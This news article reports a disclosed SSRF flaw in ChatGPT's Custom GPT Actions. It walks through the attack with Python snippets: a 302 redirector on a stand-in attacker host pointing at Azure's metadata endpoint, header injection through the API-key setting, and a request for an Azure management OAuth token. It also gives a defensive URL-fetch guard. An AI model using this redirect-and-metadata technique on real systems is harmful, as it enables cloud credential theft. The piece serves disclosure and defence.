Hackers Exploit SSRF Flaw in Custom GPTs to Steal ChatGPT Secrets

A cybersecurity researcher has uncovered a server-side request forgery (SSRF) vulnerability in OpenAI’s ChatGPT.

The flaw, hidden in the Custom GPTs feature, allowed attackers to potentially access sensitive cloud infrastructure secrets, including Azure management API tokens.

Disclosed through OpenAI’s bug bounty program, the issue was swiftly patched, but it underscores the persistent dangers of SSRF in cloud-based AI services.

Attack Flow

While building a custom GPT, the premium ChatGPT Plus feature for creating tailored AI assistants, the researcher noticed the “Actions” section.

This feature lets users define external APIs via OpenAPI schemas, enabling the GPT to fetch data from user-specified URLs and incorporate it into responses. Examples include querying weather APIs for location-based info.
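To make that concrete, the sketch below shows roughly what such a schema looks like, written here as a Python dictionary purely for illustration; the server URL, operation, and parameter names are hypothetical, and the key point is that the builder fully controls the target URL.

```python
# Hypothetical sketch of the kind of OpenAPI schema a Custom GPT Action accepts,
# expressed as a Python dict purely for illustration. The server URL and
# operation names are made up; what matters is that the builder supplies the URL.
weather_action_schema = {
    "openapi": "3.1.0",
    "info": {"title": "Weather Lookup", "version": "1.0.0"},
    "servers": [{"url": "https://api.example-weather.com"}],  # builder-supplied URL
    "paths": {
        "/current": {
            "get": {
                "operationId": "getCurrentWeather",
                "parameters": [
                    {"name": "city", "in": "query", "schema": {"type": "string"}}
                ],
                "responses": {"200": {"description": "Current conditions"}},
            }
        }
    },
}
```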

However, the ability to provide arbitrary URLs triggered the researcher’s “hacker instinct,” prompting a probe for an SSRF vulnerability.

SSRF occurs when an application unwittingly forwards user-supplied requests to unintended destinations, often internal networks or cloud metadata endpoints.

Ranked in the OWASP Top 10 since 2021, SSRF abuses the server’s privileged network position to reach resources the attacker cannot access directly.

Impacts range from data exfiltration in “full-read” variants, where responses are returned to the attacker, to “blind” SSRF, which enables port scanning or service interactions via timing differences.
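As a generic illustration of the full-read pattern (not OpenAI’s code), consider a backend that fetches whatever URL a client supplies and returns the body; the client can then read from hosts only the server can see:

```python
import requests
from flask import Flask, request

app = Flask(__name__)

# Generic SSRF illustration, not OpenAI's implementation: the server fetches
# whatever URL the client supplies and returns the response body, so the
# client can read from hosts only the server can reach (internal services,
# cloud metadata endpoints, and so on).
@app.route("/fetch")
def fetch():
    url = request.args["url"]            # attacker-controlled destination
    resp = requests.get(url, timeout=5)  # the request originates from the server
    return resp.text                     # "full-read" SSRF: the body comes back
```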

In cloud setups like Azure, AWS, or GCP, SSRF can escalate dramatically by targeting instance metadata services (IMDS), accessible only locally at endpoints like http://169.254.169.254.

Secret Key Leaked

These metadata endpoints hold critical details: instance IDs, network configurations, and temporary credentials that grant broader API access.
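On an Azure VM, a metadata query looks roughly like the following; 169.254.169.254 is link-local and unreachable from outside the machine, and the api-version shown is a commonly documented one rather than the one used in this research:

```python
import requests

# Querying the Azure Instance Metadata Service from inside a VM. The address
# is link-local, so only code running on the instance (or something it can be
# tricked into proxying) can reach it. The api-version here is a commonly
# documented one, used for illustration.
resp = requests.get(
    "http://169.254.169.254/metadata/instance",
    params={"api-version": "2021-02-01"},
    headers={"Metadata": "true"},  # Azure rejects requests without this header
    timeout=2,
)
print(resp.json())  # instance ID, network configuration, tags, and more
```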

The researcher targeted ChatGPT’s Azure-hosted backend. Initial attempts to point the API URL to the IMDS failed; the system enforced HTTPS, blocking the HTTP-only metadata endpoint.
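OpenAI’s actual validation logic is not public, but a simple scheme check of the kind sketched below would explain the behavior: the HTTP-only IMDS address is rejected outright, while any HTTPS URL, including an attacker-controlled one, passes.

```python
from urllib.parse import urlparse

# Illustrative only: a scheme check like this would account for the observed
# behavior. It says nothing about where an HTTPS URL may later redirect.
def is_allowed_action_url(url: str) -> bool:
    return urlparse(url).scheme == "https"

print(is_allowed_action_url("http://169.254.169.254/metadata/instance"))   # False
print(is_allowed_action_url("https://attacker.example/redirect-to-imds"))  # True
```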

Undeterred, they employed a classic bypass: a 302 redirect. Using a tool akin to Burp Collaborator, the researcher hosted an HTTPS endpoint that redirected to the internal IMDS URL.
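A redirector of this sort is trivial to stand up. The sketch below uses Flask and a hypothetical attacker-controlled hostname; the key idea is that URL validation sees only the outer HTTPS address, while the fetcher follows the redirect to the internal endpoint afterwards.

```python
from flask import Flask, redirect

app = Flask(__name__)

# Sketch of the redirect trick. Served over TLS at a hypothetical address such
# as https://attacker.example/weather, this endpoint bounces the server-side
# fetcher to the HTTP-only IMDS address after URL validation has already passed.
@app.route("/weather")
def weather():
    return redirect(
        "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
        code=302,
    )
```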

When tested via the GPT’s “Test” button, ChatGPT followed the redirect and reached the metadata service, but only partially: Azure requires a “Metadata: True” header for access, and its absence resulted in an error.

Further experimentation revealed a workaround in the authentication settings. By naming a custom API key “Metadata” and setting its value to “True,” the required header was injected into the request. Success: the GPT returned IMDS data.
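In effect, the API-key setting behaves like a custom request header. The generic client sketched below shows how a header name of “Metadata” and a key value of “True” end up producing exactly the header Azure expects:

```python
import requests

# Generic illustration of an API-key setting that is sent as a request header.
# With the header name "Metadata" and the key value "True", the outgoing
# request carries exactly the header the Azure IMDS requires.
def call_action(url: str, api_key_header: str, api_key_value: str):
    headers = {api_key_header: api_key_value}  # e.g. {"Metadata": "True"}
    return requests.get(url, headers=headers, timeout=5)

resp = call_action(
    "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
    api_key_header="Metadata",
    api_key_value="True",
)
```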

Escalating, the researcher requested an OAuth2 token for Azure’s management API (resource: https://management.azure.com/, API version: 2025-04-07).

The response included a valid token, granting potential control over ChatGPT’s cloud resources, such as spinning up instances or querying storage.
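The token comes from the IMDS managed-identity endpoint, reached with the same redirect-plus-header combination; the request below is a sketch using the resource and API version cited in the write-up:

```python
import requests

# Sketch of the escalation step: the IMDS managed-identity endpoint mints an
# OAuth2 access token scoped to the Azure management API. The resource and
# api-version values are the ones reported in the research.
resp = requests.get(
    "http://169.254.169.254/metadata/identity/oauth2/token",
    params={
        "api-version": "2025-04-07",
        "resource": "https://management.azure.com/",
    },
    headers={"Metadata": "True"},
    timeout=2,
)
access_token = resp.json().get("access_token")  # bearer token for ARM requests
```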

Reported immediately to OpenAI via Bugcrowd, the vulnerability was rated high severity: not as damaging as past exploits such as remote code execution across hundreds of EC2 instances, but severe enough to expose infrastructure secrets.

OpenAI patched it rapidly, likely tightening URL validation, redirect handling, and header controls.

This incident highlights AI’s double-edged sword: innovative features like Custom GPTs boost utility but expand the attack surface.

As cloud adoption surges, developers must prioritize SSRF mitigations such as IP whitelisting, protocol enforcement, and strict redirect handling. For users, it reinforces the need for vigilance: even “helpful” AI features can become a vector for compromise.
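One possible shape of such a guard, sketched below rather than taken from OpenAI’s fix, is to enforce HTTPS, resolve the hostname, reject private, loopback, and link-local addresses, and refuse to follow redirects so the checks cannot be bypassed after validation:

```python
import ipaddress
import socket
from urllib.parse import urlparse

import requests

# A sketch of an SSRF guard, not OpenAI's actual fix: enforce HTTPS, resolve
# the hostname, reject non-public addresses, and do not follow redirects so a
# 302 cannot re-route the request after the checks have passed.
def safe_fetch(url: str) -> requests.Response:
    parsed = urlparse(url)
    if parsed.scheme != "https":
        raise ValueError("only HTTPS URLs are allowed")
    for info in socket.getaddrinfo(parsed.hostname, None):
        addr = ipaddress.ip_address(info[4][0])
        if addr.is_private or addr.is_link_local or addr.is_loopback:
            raise ValueError("URL resolves to a non-public address")
    return requests.get(url, allow_redirects=False, timeout=5)
```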
